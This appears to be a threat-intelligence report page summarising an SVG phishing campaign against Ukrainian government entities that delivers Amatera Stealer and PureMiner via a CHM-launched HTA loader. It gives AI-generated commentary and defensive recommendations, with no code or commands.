SVG Phishing hits Ukraine with Amatera Stealer, PureMiner

SUMMARY :

A phishing campaign targeting Ukrainian government entities uses malicious SVG files to initiate an infection chain. The attack begins with emails containing SVG attachments that redirect victims to a download site. A CHM file is then used to execute a remote HTA loader, which delivers two malware payloads: Amatera Stealer and PureMiner. Amatera Stealer harvests extensive information from infected systems, including credentials, system data, application data, browser files, and cryptocurrency wallets. PureMiner collects hardware information and monitors system activity to deploy efficient CPU or GPU mining modules. The campaign demonstrates sophisticated techniques, including fileless malware delivery and the use of multiple stages to evade detection.

OPENCTI LABELS :

fileless,phishing,ukraine,chm,cryptomining,data theft,svg,pureminer,amatera stealer,countloader,hta loader


AI COMMENTARY :

1. The recently uncovered phishing campaign titled “SVG Phishing hits Ukraine with Amatera Stealer, PureMiner” targets Ukrainian government entities through a deceptive email vector that leverages seemingly innocuous SVG attachments. The malicious SVG files covertly redirect recipients to a fake download portal, marking the campaign’s initial foray into system compromise. By exploiting the widespread trust in standard graphics formats and combining it with a fileless approach, attackers aim to bypass conventional security controls while appearing benign to both end users and detection tools.

2. Once users follow the link embedded in the SVG attachments, they encounter a CHM (Compiled HTML Help) file masquerading as a benign document. This CHM payload executes an HTA Loader in memory, employing a fileless technique that keeps artifacts off the disk and evades signature-based defenses. The HTA Loader, also referred to by researchers as countloader, serves as the gatekeeper for subsequent malicious stages, demonstrating an advanced level of operational security and stealthiness in the infection chain.

3. Following successful execution of the HTA Loader, victims receive two distinct malware payloads: Amatera Stealer and PureMiner. Amatera Stealer focuses on extensive data theft by harvesting credentials, system metadata, application data, browser files, and even cryptocurrency wallet information. Its comprehensive scope of data exfiltration poses a severe risk to both personal and institutional privacy, especially for government agencies handling sensitive information.

4. In parallel, PureMiner brings cryptomining capabilities to the infection, collecting hardware specifications and monitoring system performance to deploy optimized mining modules. By dynamically determining whether to use CPU or GPU resources, PureMiner maximizes mining efficiency while minimizing its footprint, prolonging its presence on compromised machines. This dual-threat model combining data theft with cryptomining amplifies the campaign’s ROI for threat actors and complicates remediation efforts.

5. The campaign’s reliance on sophisticated fileless execution, multi-stage loaders, and the dual deployment of Amatera Stealer and PureMiner highlights a growing trend in advanced phishing operations. The use of SVG attachments as the initial lure, combined with CHM-based HTA loaders, underscores attackers’ willingness to adopt unconventional formats to sidestep standard email defenses. This strategy demands enhanced monitoring of script-based processes in memory and a reevaluation of security policies around legacy file types and help documents.

6. To mitigate these threats, organizations—particularly those within Ukraine’s public sector—should enforce strict email attachment controls, implement behavioral analysis tools capable of identifying fileless execution, and conduct regular threat hunting exercises focused on in-memory loaders like countloader and HTA components. Endpoint detection solutions must be tuned to flag unauthorized HTA and CHM executions, and user awareness programs should stress the dangers of opening unsolicited attachments labeled with uncommon file extensions.

7. In conclusion, the “SVG Phishing hits Ukraine with Amatera Stealer, PureMiner” campaign exemplifies the evolving landscape of threat intel, where fileless methodologies and multi-stage deployment converge to deliver potent data theft and cryptomining operations. By understanding each phase—from the malicious SVG lure to the final PureMiner installation—security teams can bolster defenses against this and future sophisticated phishing threats.


OPEN NETMANAGEIT OPENCTI REPORT LINK!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


SVG Phishing hits Ukraine with Amatera Stealer, PureMiner